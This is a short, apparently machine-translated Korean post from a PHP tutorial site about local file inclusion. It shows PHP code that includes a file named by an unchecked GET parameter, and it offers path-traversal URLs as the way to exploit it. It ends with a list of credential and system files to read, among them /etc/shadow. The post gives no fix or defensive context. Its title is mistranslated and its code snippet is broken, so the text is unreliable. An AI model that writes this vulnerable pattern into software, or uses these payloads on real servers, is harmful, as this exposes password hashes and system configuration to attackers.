>  기사  >  백엔드 개발  >  PHP는 취약한 코드가 포함된 로컬 파일을 위조합니다.

PHP는 취약한 코드가 포함된 로컬 파일을 위조합니다.

高洛峰
高洛峰원래의
2016-11-30 13:17:231224검색

코드는 다음과 같습니다.
$page=$_GET['page']
include($page.'php')?> 🎜>
이렇게 사용하시면 됩니다
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index .php?page= ../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

더 많은 업데이트 받기 다중 데이터:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/ 그룹
/etc /security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.